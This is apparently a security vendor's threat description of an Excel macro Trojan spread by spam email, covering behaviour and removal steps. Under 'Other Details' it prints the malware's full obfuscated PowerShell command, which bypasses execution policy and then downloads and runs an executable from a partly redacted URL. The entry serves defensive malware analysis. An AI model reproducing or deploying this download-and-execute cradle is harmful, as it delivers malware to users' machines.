Analysis by: Michael Jay Villanueva

ALIASES:

X97M/Downloader.fc (McAfee); X97M/Agent.gen (F-Protect); X97M.DownLoader.157 (DrWeb)

 PLATFORM:

Windows

 OVERALL RISK RATING:
 DAMAGE POTENTIAL:
 DISTRIBUTION POTENTIAL:
 REPORTED INFECTION:
 INFORMATION EXPOSURE:

  • Threat Type: Trojan

  • Destructiveness: No

  • Encrypted: No

  • In the wild: Yes

  OVERVIEW

Infection Channel: Spammed via email

This Trojan arrives as an attachment to email messages spammed by other malware/grayware or malicious users.

It does not have any propagation routine.

It does not have any backdoor routine.

It executes the downloaded files. As a result, malicious routines of the downloaded files are exhibited on the affected system. As of this writing, the said sites are inaccessible.

It does not have any information-stealing capability.

  TECHNICAL DETAILS

File Size: 50,688 bytes
File Type: XLS
Memory Resident: No
Initial Samples Received Date: 05 Sep 2017
Payload: Connects to URLs/IPs, Downloads files

Arrival Details

This Trojan arrives as an attachment to email messages spammed by other malware/grayware or malicious users.

Propagation

This Trojan does not have any propagation routine.

Backdoor Routine

This Trojan does not have any backdoor routine.

Rootkit Capabilities

This Trojan does not have rootkit capabilities.

Download Routine

This Trojan connects to the following website(s) to download and execute a malicious file:

  • http://{BLOCKED}n.com/vips

It saves the files it downloads using the following names:

  • %User Profile%\Documents\{Random Filename}.exe

(Note: %User Profile% is the current user's profile folder, which is usually C:\Documents and Settings\{user name} on Windows 2000, XP, and Server 2003, or C:\Users\{user name} on Windows Vista and 7.)

It then executes the downloaded files. As a result, malicious routines of the downloaded files are exhibited on the affected system.

As of this writing, the said sites are inaccessible.

Information Theft

This Trojan does not have any information-stealing capability.

Other Details

This Trojan does the following:

  • It uses the following Powershell to download and execute a malicious file:
    • pOwERShell.exe -nOl -NoNiNt -WInDOws 1 -NoprOFIle -eXEcU BYpaSs $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='';$uy='{Random Filename}';$ji='.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'http://{BLOCKED}n.com/vips'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe);

It does not exploit any vulnerability.

NOTES:

The Microsoft Excel file contains the following fake details luring users to enable macro content:

  SOLUTION

Minimum Scan Engine: 9.850
FIRST VSAPI PATTERN FILE: 13.652.05
FIRST VSAPI PATTERN DATE: 11 Sep 2017
VSAPI OPR PATTERN File: 13.653.80
VSAPI OPR PATTERN Date: 12 Sep 2017

Step 1

Before doing any scans, Windows XP, Windows Vista, and Windows 7 users must disable System Restore to allow full scanning of their computers.

Step 2

Note that not all files, folders, and registry keys and entries are installed on your computer during this malware's/spyware's/grayware's execution. This may be due to incomplete installation or other operating system conditions. If you do not find the same files/folders/registry information, please proceed to the next step.

Step 3

Search and delete these files

[ Learn More ]
There may be some files that are hidden. Please make sure you check the Search Hidden Files and Folders checkbox in the "More advanced options" option to include all hidden files and folders in the search result.
  • %User Profile%\Documents\{Random Filename}.exe

Step 4

Scan your computer with your Trend Micro product to delete files detected as X2KM_POWSHELL.BB. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check this Knowledge Base page for more information.

Step 5

Enable the macro virus protection in Microsoft Office Applications

[ Learn More ]


Did this description help? Tell us how we did.